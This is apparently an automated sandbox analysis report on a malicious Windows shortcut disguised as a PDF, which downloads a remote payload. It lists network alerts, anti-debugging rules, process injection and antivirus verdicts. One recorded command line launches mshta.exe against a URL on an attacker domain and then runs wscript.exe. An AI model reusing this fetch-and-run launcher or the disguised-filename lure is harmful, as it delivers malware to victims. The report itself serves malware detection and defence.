Summary | ZeroBOX

United_States_Project_for_Promise.pdf .lnk

Tags: Anti_VM, AntiVM, AntiDebug, GIF Format

Category: FILE
Machine: s1_win7_x6402
Started: July 1, 2021, 8:51 a.m.
Completed: July 1, 2021, 8:53 a.m.
Size: 483.0KB
Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Sat Dec 7 00:10:00 2019, mtime=Wed Jun 16 21:15:56 2021, atime=Sat Dec 7 00:10:00 2019, length=13312, window=hide
MD5: e05468aaa0c436e953116989ccf9703b
SHA256: c54cde89abbc781c3c435b2bc2a71189a78f34cd4dfa3a0e804eea407d14c944
CRC32: 88639C96
ssdeep: 12288:VSiMFcV6ME5R2X+l8uM/6+9CjoNozoDMftO2:VSpc3E5MXC8uZVMytv
Yara
  • anti_vm_detect - Possibly employs anti-virtualization techniques
  • Lnk_Format_Zero - LNK Format

DNS lookups (Name | Response | Post-Analysis Lookup)
dadsasoa.in | 31.220.106.229 |

Contacted hosts (IP Address | Status | Action)
164.124.101.2 | Active | Moloch
172.217.25.14 | Active | Moloch
31.220.106.229 | Active | Moloch

Suricata Alerts

Flow | SID | Signature | Category
TCP 192.168.56.102:49810 -> 31.220.106.229:443 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 192.168.56.102:49810 -> 31.220.106.229:443 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 192.168.56.102:49811 -> 31.220.106.229:443 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 192.168.56.102:49810 -> 31.220.106.229:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 192.168.56.102:49808 -> 31.220.106.229:443 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 192.168.56.102:49811 -> 31.220.106.229:443 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 192.168.56.102:49808 -> 31.220.106.229:443 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 192.168.56.102:49817 -> 31.220.106.229:443 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 192.168.56.102:49808 -> 31.220.106.229:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 192.168.56.102:49817 -> 31.220.106.229:443 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49808 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49817 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49811 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49817 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49808 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49811 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 192.168.56.102:49829 -> 31.220.106.229:443 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 192.168.56.102:49829 -> 31.220.106.229:443 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 192.168.56.102:49824 -> 31.220.106.229:443 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 192.168.56.102:49813 -> 31.220.106.229:443 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 192.168.56.102:49824 -> 31.220.106.229:443 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 192.168.56.102:49813 -> 31.220.106.229:443 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 192.168.56.102:49824 -> 31.220.106.229:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 192.168.56.102:49813 -> 31.220.106.229:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 31.220.106.229:443 -> 192.168.56.102:49829 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49829 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49813 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49824 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49813 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49824 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49810 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49810 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 192.168.56.102:49819 -> 31.220.106.229:443 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 192.168.56.102:49827 -> 31.220.106.229:443 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 192.168.56.102:49819 -> 31.220.106.229:443 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 192.168.56.102:49827 -> 31.220.106.229:443 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 192.168.56.102:49819 -> 31.220.106.229:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 192.168.56.102:49827 -> 31.220.106.229:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 192.168.56.102:49814 -> 31.220.106.229:443 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49819 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49827 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49819 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 192.168.56.102:49814 -> 31.220.106.229:443 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49827 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 192.168.56.102:49814 -> 31.220.106.229:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 192.168.56.102:49821 -> 31.220.106.229:443 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49814 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 192.168.56.102:49821 -> 31.220.106.229:443 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49814 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49821 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49821 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 192.168.56.102:49825 -> 31.220.106.229:443 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 192.168.56.102:49825 -> 31.220.106.229:443 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 192.168.56.102:49828 -> 31.220.106.229:443 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49825 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 192.168.56.102:49828 -> 31.220.106.229:443 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49825 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 192.168.56.102:49828 -> 31.220.106.229:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 31.220.106.229:443 -> 192.168.56.102:49828 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49828 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 192.168.56.102:49820 -> 31.220.106.229:443 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 192.168.56.102:49820 -> 31.220.106.229:443 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 192.168.56.102:49820 -> 31.220.106.229:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 31.220.106.229:443 -> 192.168.56.102:49820 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49820 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 192.168.56.102:49823 -> 31.220.106.229:443 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 192.168.56.102:49823 -> 31.220.106.229:443 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode
TCP 192.168.56.102:49823 -> 31.220.106.229:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 31.220.106.229:443 -> 192.168.56.102:49823 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode
TCP 31.220.106.229:443 -> 192.168.56.102:49823 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

API call: GlobalMemoryStatusEx
Arguments: (none)
Status: 1, Return: 1, Repeated: 0
API call: NtProtectVirtualMemory
Arguments:
process_identifier: 7724
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73772000
process_handle: 0xffffffff
Status: 1, Return: 0, Repeated: 0

File: C:\Users\test22\AppData\Local\Temp\United_States_Project_for_Promise.pdf .lnk
Command line: "C:\Windows\System32\mshta.exe" https://dadsasoa.in/font/js/images/files/United-States_Project_for_Promise/css && wscript.exe
API call: NtProtectVirtualMemory
Arguments:
process_identifier: 7724
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
Status: 1, Return: 0, Repeated: 0
Matched rules (rule, description):
rule DebuggerCheck__GlobalFlags (no description)
rule DebuggerCheck__QueryInfo (no description)
rule DebuggerHiding__Thread (no description)
rule DebuggerHiding__Active (no description)
rule ThreadControl__Context (no description)
rule SEH__vectored (no description)
rule anti_dbg: Checks if being debugged
rule disable_dep: Bypass DEP

Host: 172.217.25.14
API call: RegSetValueExA
Arguments:
key_handle: 0x000002dc
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
Status: 1, Return: 0, Repeated: 0

Process injection: process 4564 resumed a thread in remote process 7724

API call: NtResumeThread
Arguments:
thread_handle: 0x00000334
suspend_count: 1
process_identifier: 7724
Status: 1, Return: 0, Repeated: 0
Antivirus detections (vendor, result)

Arcabit Heur.BZC.YAX.Nioc.1.07376574
Cyren LNK/Trojan.TXNC-4
TrendMicro-HouseCall TROJ_FRS.VSNTFL21
Kaspersky HEUR:Trojan.WinLNK.Agent.gen
BitDefender Heur.BZC.YAX.Nioc.1.07376574
ViRobot LNK.S.Downloader.494560
MicroWorld-eScan Heur.BZC.YAX.Nioc.1.07376574
Rising Downloader.Mshta/LNK!1.BADA (CLASSIC)
Ad-Aware Heur.BZC.YAX.Nioc.1.07376574
Sophos Troj/DownLnk-BD
TrendMicro TROJ_FRS.VSNTFL21
FireEye Heur.BZC.YAX.Nioc.1.07376574
Emsisoft Heur.BZC.YAX.Nioc.1.07376574 (B)
Ikarus BZC.YAX.Nioc
Microsoft Trojan:Script/Wacatac.B!ml
AegisLab Trojan.WinLNK.Nioc.4!c
ZoneAlarm HEUR:Trojan.WinLNK.Agent.gen
GData Heur.BZC.YAX.Nioc.1.07376574
ALYac Trojan.Agent.LNK.Gen
MAX malware (ai score=82)
VBA32 Trojan.Link.Crafted
Zoner Probably Heur.LNKScript